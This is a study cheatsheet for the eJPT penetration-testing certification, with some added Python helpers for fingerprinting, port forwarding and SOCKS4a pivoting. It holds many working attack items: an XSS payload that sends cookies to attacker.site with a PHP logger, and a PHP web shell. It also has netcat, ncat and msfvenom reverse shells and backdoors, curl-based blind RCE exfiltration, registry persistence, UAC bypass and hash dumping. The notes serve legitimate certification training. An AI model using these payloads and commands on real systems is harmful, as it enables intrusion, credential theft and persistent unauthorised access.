eJPT-notes

Note: These are all the notes I took while following the INE course for the eJPT certification; I strongly think everything you need to pass the exam is in this ‘cheatsheet’.

Notes by @edoardottt, exam passed with 19/20 score.

Info about eJPT certification here.
Read also my blog post about eJPT certification.

Exam setup

Add a route in IP routes

Linux:

ip route add <destination network> via <gateway>

Show IP addresses

Linux:

ip addr

Show ARP/neighbor table (what the notes call the CAM table; the real CAM table lives on the switch, on a host this is the ARP cache)

Linux:

ip neighbor

or (shows only your own interfaces' addresses and MACs, not the neighbors)

ifconfig

Show Listening ports (both UDP and TCP)

Linux:

netstat -tunlp

(-l listening sockets, -t TCP, -u UDP, -n numeric, -p owning process; without -l only established connections are listed)

Windows:

netstat -ano

ARP Spoofing

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i <interface> -t <target> -r <host>

ip_forward must be 1, otherwise the victims' packets stop at our machine, the link goes dead and the attack is noticed. -t is the victim to poison, the last argument is the host we impersonate; -r poisons both of them so traffic is captured in both directions. Ctrl-C makes arpspoof restore the real ARP entries.

To intercept the traffic between 192.168.4.11 and 192.168.4.16:

arpspoof -i eth0 -t 192.168.4.11 -r 192.168.4.16

Ping sweeping

fping -a -g 192.168.1.0/24 2> /dev/null

or

fping -a -f targets.txt 2>/dev/null

or

nmap -sn 192.168.1.0/24

or

nmap -sn -iL networks.txt

OS Fingerprinting

nmap -Pn -O <target(s)>

Port Scanning

nmap…Then remember:

Example:

nmap -sS -p 1-100,443 192.168.1.13,14

Tip: Use --reason to show the explanation of why a port is marked open or closed
Tip: Use --open to show only open, open|filtered, and unfiltered ports.

TCP Quick Scan

nmap -sV -sC 192.168.1.1

TCP Full Scan

nmap -sV -sC -p- 192.168.1.1

UDP Quick Scan

nmap -sV -sU 192.168.1.1

Note: UDP scans need root and are slow: closed ports answer with rate-limited ICMP errors and open ones often answer nothing at all (open|filtered), so restrict the port list when you can.

Get info on a particular service

nmap -sC -p 27017 192.168.1.13 | less

Masscan

Check if masscan is properly installed:

masscan --regress

Scan example:

masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24

Note: masscan builds its own packets, so the kernel knows nothing about the connections and answers every SYN/ACK with a RST, which kills banner grabbing. For --banners to work use a spare --source-ip on the same subnet, or pick a fixed --source-port and drop inbound packets to that port with iptables so the kernel never sees them (masscan still captures them with pcap). -Pn is only accepted for nmap compatibility and changes nothing.

If you want to use a VPN connection (configure the options properly):

masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24 -e tap0 --router-ip 192.168.1.1

In order to save the configuration into a file:

masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24 --echo > masscan.conf

Use the configuration file as input:

masscan -c masscan.conf

Web Fingerprinting

Using netcat:

nc 192.168.1.2 80
HEAD / HTTP/1.1
Host: 192.168.1.2

Using openssl (same request, over TLS):

openssl s_client -connect target.site:443
HEAD / HTTP/1.1
Host: target.site

Note: HTTP/1.1 requires the Host header (without it most servers answer 400), and the request is only sent after the empty line, so press Enter twice. The interesting headers in the reply are Server and X-Powered-By.

Using httprint:

httprint -P0 -h 192.168.1.1 -s /usr/local/bin/signatures.txt
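The same HEAD check scripted, as an added example that is not part of the original notes: it builds the request, parses the status line and the headers, and keeps the ones that identify the server software. The sample response is constructed; grab() does the live version over plain TCP or TLS (the openssl s_client case), with certificate checks disabled on purpose because lab hosts use self-signed certificates.

```python
import socket
import ssl

# Constructed sample: what a typical Apache/PHP host answers to a HEAD request.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    b"Server: Apache/2.4.41 (Ubuntu)\r\n"
    b"X-Powered-By: PHP/7.4.3\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"\r\n"
)

# Headers that usually leak software and version information.
FINGERPRINT_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator", "via")


def build_head_request(host, path="/"):
    """HTTP/1.1 requires a Host header; the empty line terminates the request."""
    return (
        f"HEAD {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


def parse_response(raw):
    """Split a raw response into the status line and a lower-cased header dict."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")   # first colon only: values contain colons
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"status": lines[0], "headers": headers}


def fingerprint(raw):
    """Keep only the headers worth noting; missing ones simply do not appear."""
    parsed = parse_response(raw)
    hints = {h: parsed["headers"][h] for h in FINGERPRINT_HEADERS if h in parsed["headers"]}
    return {"status": parsed["status"], "hints": hints}


def grab(host, port=80, tls=False, timeout=5.0):
    """Send the HEAD request over TCP (or TLS) and fingerprint whatever comes back."""
    sock = socket.create_connection((host, port), timeout=timeout)
    if tls:
        # Verification is off on purpose: we want the banner, not a trust decision.
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        sock = ctx.wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(build_head_request(host))
        chunks = []
        while b"\r\n\r\n" not in b"".join(chunks):
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return fingerprint(b"".join(chunks))


if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print(fingerprint(SAMPLE_RESPONSE))
    else:
        host = sys.argv[1]
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
        print(grab(host, port, tls=(port == 443)))
```

Run it with a host and port (443 switches to TLS) to fingerprint a live target, or with no arguments to see the parser work on the constructed response.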

Directory/Files enumeration with dirb

Default scan:

dirb http://google.com

Using a custom wordlist:

dirb http://google.com /usr/share/dirb/wordlists/small.txt

Using cookies:

dirb http://google.com -c "COOKIE:XYZ"

Using Basic Authentication:

dirb http://google.com -u "admin:password"

Using Custom Header:

dirb http://google.com -H "MyHeader: MyContent"

Disable recursive enumeration:

dirb http://google.com -r

Set Speed delay in milliseconds:

dirb http://google.com -z 1000

(adds a delay between requests, in milliseconds)

Specify extensions:

dirb http://google.com -X ".php,.bak"

Save results in a file:

dirb http://google.com -o results.txt

Google Dorks

Example: -inurl:(htm|html|php|asp|jsp) intitle:"index of" "last modified" "parent directory" txt OR doc OR pdf
See also the Google Hacking Database

XSS

Payload: <script>var i = new Image(); i.src = "http://attacker.site/log.php?q=" + encodeURIComponent(document.cookie);</script>

Note: the parameter must be ?q= (the name the server reads); encodeURIComponent stops characters such as & or # in the cookie from cutting the URL short. This only works if the session cookie is not flagged HttpOnly.

Server (log.php):

<?php
// Appends whatever arrives in ?q= to a local log file, one entry per line.
$filename = "/tmp/log.txt";
$fp = fopen($filename, 'a');
$cookie = $_GET['q'];
fwrite($fp, $cookie . "\n");
fclose($fp);
?>

SQLi

Payloads:

Sqlmap:

Tip: Dump only the data you’re interested in, not the whole database. Dumping a lot of data using SQLi is very noisy and a heavy process.

Misconfigured PUT method

wc -c payload.php
20 payload.php
nc victim.site 80
PUT /payload.php HTTP/1.1
Host: victim.site
Content-type: text/html
Content-length: 20

<?php phpinfo(); ?>

Note: Content-length is the body size in bytes (wc -c); wc -m counts characters, which gives the same number only for pure ASCII. The empty line between the headers and the body is part of the request. A 201 Created or 204 No Content reply means the file is there.

Uploading PHP shell

<?php
// Minimal web shell: /shell.php?cmd=id runs the command and shows its output.
if (isset($_GET['cmd']))
{
    $cmd = $_GET['cmd'];
    echo '<pre>';
    $result = shell_exec($cmd);
    echo $result;
    echo '</pre>';
}
?>

Authentication Cracking with Hydra

Authentication Cracking with nmap

Authentication Cracking with metasploit

Password cracking using John the Ripper

Cracking Password of Microsoft Word file using John the Ripper

Password cracking using Hashcat

Windows Shares

Interesting shares:

Enumerating shares (Windows):

Enumerating shares (Linux):

Metasploit

msfconsole
show -h
search <keyword(s)>
use <path-to-exploit>
show options
set <option-name> <option-value> 
exploit

Tip: Use show payloads when an exploit is selected to show only the available payloads for that exploit
Tip: Use info when an exploit is selected to get information about the exploit
Tip: Use back to deselect the current module and return to the main msf prompt

Meterpreter

Inside metasploit:

Tip: help shows an amazing list of available commands divided by category
Tip: If getsystem fails (UAC is usually the reason), run use exploit/windows/local/bypassuac against the session and try getsystem again in the new one
Tip: ps -U SYSTEM shows only the processes with SYSTEM privileges
Tip: Use post/windows/gather/hashdump to dump the passwords DB and save it for an offline cracking session

Pivoting with Meterpreter

Let’s say we have compromised a machine using metasploit and we have a meterpreter shell with session id 1. We discover that there is another machine but it’s reachable only from the compromised machine.
Our IP: 192.180.40.2
Compromised host: 192.180.40.3
Unreachable machine: 192.130.110.3

Before scanning, add a route for 192.130.110.0/24 through session 1 (route add in msfconsole, or the post/multi/manage/autoroute module), otherwise the scanner tries to reach that network from our own host.

If we want to scan the 192.130.110.0/24 network we can use:

msf > use auxiliary/scanner/portscan/tcp
msf > set PORTS 80, 8080, 445, 21, 22, ...
msf > set RHOSTS 192.130.110.1-254
msf > exploit

If we discover that at least one port is open and we want to target a specific port on a specific host (e.g. 192.130.110.3:21) we can forward a local port to it from inside the meterpreter session:

meterpreter > portfwd add -l 1234 -p 21 -r 192.130.110.3

Then if we want to scan the service we can use nmap against the forwarded port on our own machine (nmap can be run directly from the msf prompt):

msf > nmap -sS -sV -p 1234 localhost
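What portfwd does under the hood, as an added example that is not from the original notes: a TCP relay that listens on a local port and copies bytes in both directions to the remote service, which is why nmap against localhost:1234 ends up talking to 192.130.110.3:21. The echo service is a constructed stand-in for the far-side service, and the 127.0.0.1 addresses and ephemeral ports are assumptions so that the whole thing runs on one box.

```python
import socket
import threading


def pipe(src, dst):
    """Copy bytes from src to dst until src hits EOF, then half-close dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def handle(client, remote_host, remote_port):
    """One forwarded connection: connect the remote side, relay both ways, clean up."""
    try:
        remote = socket.create_connection((remote_host, remote_port), timeout=10)
    except OSError:
        client.close()
        return
    remote.settimeout(None)
    up = threading.Thread(target=pipe, args=(client, remote), daemon=True)
    down = threading.Thread(target=pipe, args=(remote, client), daemon=True)
    up.start(); down.start()
    up.join(); down.join()
    client.close(); remote.close()


def start_forwarder(local_port, remote_host, remote_port, local_host="127.0.0.1"):
    """Same job as: portfwd add -l local_port -p remote_port -r remote_host

    Returns (bound_port, listening_socket); closing the socket stops the accept loop."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((local_host, local_port))
    srv.listen(16)

    def accept_loop():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:  # listener closed
                return
            threading.Thread(target=handle, args=(client, remote_host, remote_port),
                             daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1], srv


def _echo_service():
    """Constructed stand-in for the service behind the pivot: echoes one connection."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def run():
        conn, _ = srv.accept()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()[1]


def demo_roundtrip(payload):
    """Send payload to the forwarder, which relays it to the echo service; return the echo."""
    fwd_port, listener = start_forwarder(0, "127.0.0.1", _echo_service())
    try:
        with socket.create_connection(("127.0.0.1", fwd_port), timeout=5) as c:
            c.sendall(payload)
            got = b""
            while len(got) < len(payload):
                chunk = c.recv(4096)
                if not chunk:
                    break
                got += chunk
        return got
    finally:
        listener.close()


if __name__ == "__main__":
    print(demo_roundtrip(b"USER anonymous\r\n"))
```

In the real pivot the relay runs inside the meterpreter process on the compromised host, so the "remote" connection is made from there; the listening socket is then exposed to us through the meterpreter channel, which is also why the forwarded port shows up on localhost rather than on the pivot.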

Reverse shell with Netcat

Attacker (listening):

nc -lvp 8888

Target (192.168.1.1 is the IP of the attacker):

nc -v 192.168.1.1 8888 -e /bin/bash

Note: the shell runs on the side that passes -e, and the target is the one connecting out; that is what makes it a reverse shell (the other way round would be a bind shell on our own box). -e only exists in netcat builds that support it (nc.traditional, ncat).

Generate a reverse shell payload with msfvenom

msfvenom --list payloads | grep <keyword>
msfvenom -p php/reverse_php lhost=192.168.0.58 lport=443 -o reverse.php
msfvenom -p linux/x64/shell/reverse_tcp lhost=192.168.0.58 lport=443 -f elf -o reverse443
chmod +x reverse443

Note: shell/reverse_tcp and meterpreter/reverse_tcp are staged payloads (slash in the name): the listener has to be exploit/multi/handler with the same payload set, because plain nc cannot send the second stage. A stageless payload such as shell_reverse_tcp (underscore) can be caught with nc -lvp 443.

Blind Remote Code Execution

The backticks run the command on the target before curl starts, so the output ends up in the URL path; all we need on our side is something listening on that port. 53 is chosen because outbound DNS is rarely filtered.

Target (192.168.1.130 is the attacker IP):

curl http://192.168.1.130:53/`whoami`

or, when the output contains spaces or several lines:

curl http://192.168.1.130:53/`id | base64 -w0`

Attacker:

nc -lvp 53

Note: -w0 stops base64 from wrapping lines, which the shell would otherwise turn into extra arguments. nc never answers, so curl on the target hangs until its timeout; that is fine for a one-shot command.

Tip: You can also create a reverse shell with msfvenom and let the target download it

Enumerating users history with meterpreter

Data exfiltration with Netcat

Receiver:

nc -lvnp 8888 > received.txt

Sender (the IP of the receiver):

cat message.txt | nc -v 192.168.1.1 8888

Backdoor using ncat

Victim:

ncat -l -p 5555 -e cmd.exe

Attacker (the IP of the victim):

ncat 192.168.1.66 5555

Reverse Backdoor using ncat

Attacker:

ncat -l -p 5555 -v

Victim (the IP of the attacker):

ncat -e cmd.exe 192.168.1.66 5555

Tip: For a persistent reverse backdoor, add the ncat command to the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, so it is launched every time a user logs on

Reverse Backdoor using Metasploit

msfconsole
use exploit/windows/local/s4u_persistence
show options
sessions
set session <session-id>
set trigger logon
set payload windows/meterpreter/reverse_tcp
set lhost <local-ip>
set lport 1234
exploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost <local-ip>
set lport 1234
exploit
sysinfo
ps
help

Tip: once we get a shell we can use screenshot to get a picture of what the victim is seeing on the Desktop
Tip: once we get a shell we can use download filename location to save the filename in the specified location on our machine
Tip: Same syntax as above but use upload to upload files
Tip: Use getsystem to gain the highest privilege (i.e. SYSTEM) on the compromised machine and getuid to check if it actually worked.

Upgrading a simple shell

bash -i
python -c 'import pty; pty.spawn("/bin/sh")'

Maintaining access using Metasploit (Windows)

Inside a meterpreter session:

Use the backdoor:

Note: The <session-id> is the one you can read when you type background
Note: The multi/handler must be configured with the same payload, LHOST and LPORT that were used when the backdoor was created, otherwise the new meterpreter session is never received.

Pivoting using a SOCKS Proxy

You have access to a compromised host and only from there you can reach another machine. That machine exposes a web server; to access it from your own computer set up a SOCKS proxy inside metasploit and push your tools through it.

Add the route to the unreachable network using autoroute or route (the proxy only relays traffic for networks that are routed through a session).

msf > use auxiliary/server/socks_proxy
msf > set VERSION 4a
msf > set SRVPORT 9050
msf > run -j
root@INE:~# proxychains nmap ...

proxychains reads /etc/proxychains.conf (or proxychains4.conf), whose default last line is socks4 127.0.0.1 9050, matching SRVPORT above. Only TCP connections are proxied: run nmap with -sT and -Pn, because a SYN scan and the ICMP/ARP host discovery use raw packets that bypass the proxy and would leave from your own host.

Then you can also set up Firefox to send requests through the SOCKS v4 proxy at 127.0.0.1:9050. VERSION 4a lets the client pass a hostname instead of an IP, so name resolution happens on the metasploit side, behind the pivot.
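The SOCKS4a handshake that proxychains and Firefox perform against 127.0.0.1:9050, as an added example (not from the original notes) that makes the VERSION 4a choice concrete: the CONNECT request carries the hostname, so DNS resolution happens on the metasploit side. The reply bytes are constructed per the SOCKS4 spec; the proxy address and the intranet.local name are assumptions.

```python
import socket
import struct

# Reply codes from the SOCKS4/4a spec (second byte of the 8-byte reply).
REPLY_CODES = {
    0x5A: "request granted",
    0x5B: "request rejected or failed",
    0x5C: "rejected: could not connect to identd on the client",
    0x5D: "rejected: identd reported a different user-id",
}

# Constructed reply bytes, as a SOCKS4 server returns them (VN=0, CD, port, ip).
GRANTED_REPLY = b"\x00\x5a\x00\x00\x00\x00\x00\x00"
REJECTED_REPLY = b"\x00\x5b\x00\x00\x00\x00\x00\x00"


def socks4a_connect_request(host, port, userid=""):
    """VN=4, CD=1 (CONNECT), DSTPORT, DSTIP=0.0.0.1, USERID NUL, HOSTNAME NUL.

    A 0.0.0.x destination address is the 4a marker: it tells the proxy to resolve
    HOSTNAME itself, i.e. inside the pivoted network rather than on our box."""
    return (struct.pack("!BBH", 4, 1, port) + b"\x00\x00\x00\x01"
            + userid.encode("ascii") + b"\x00" + host.encode("ascii") + b"\x00")


def parse_socks4_reply(reply):
    """Return True on 0x5A; raise ConnectionError with the spec's reason otherwise."""
    if len(reply) != 8 or reply[0] != 0:
        raise ValueError("not a SOCKS4 reply: %r" % reply)
    code = reply[1]
    if code == 0x5A:
        return True
    raise ConnectionError(REPLY_CODES.get(code, "unknown reply code 0x%02x" % code))


def connect_via_socks4a(host, port, proxy=("127.0.0.1", 9050), timeout=10.0):
    """Open a TCP connection to host:port through the proxy; the returned socket is the tunnel."""
    s = socket.create_connection(proxy, timeout=timeout)
    try:
        s.sendall(socks4a_connect_request(host, port))
        reply = b""
        while len(reply) < 8:
            chunk = s.recv(8 - len(reply))
            if not chunk:
                raise ConnectionError("proxy closed the connection during the handshake")
            reply += chunk
        parse_socks4_reply(reply)
    except Exception:
        s.close()
        raise
    return s


if __name__ == "__main__":
    import sys
    host, port = sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 80
    with connect_via_socks4a(host, port) as s:
        s.sendall(("HEAD / HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n" % host).encode())
        print(s.recv(4096).decode("iso-8859-1"))
```

With the socks_proxy module running, python3 socks.py 192.130.110.3 80 fetches the headers of the internal web server without proxychains; a 0x5B reply usually means the route to that network was never added in metasploit.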

Dump AutoLogin stored credentials

Inside a meterpreter session:


If you find an error or want to improve this page, just open an issue.

Don’t text/mail me looking for exam solutions.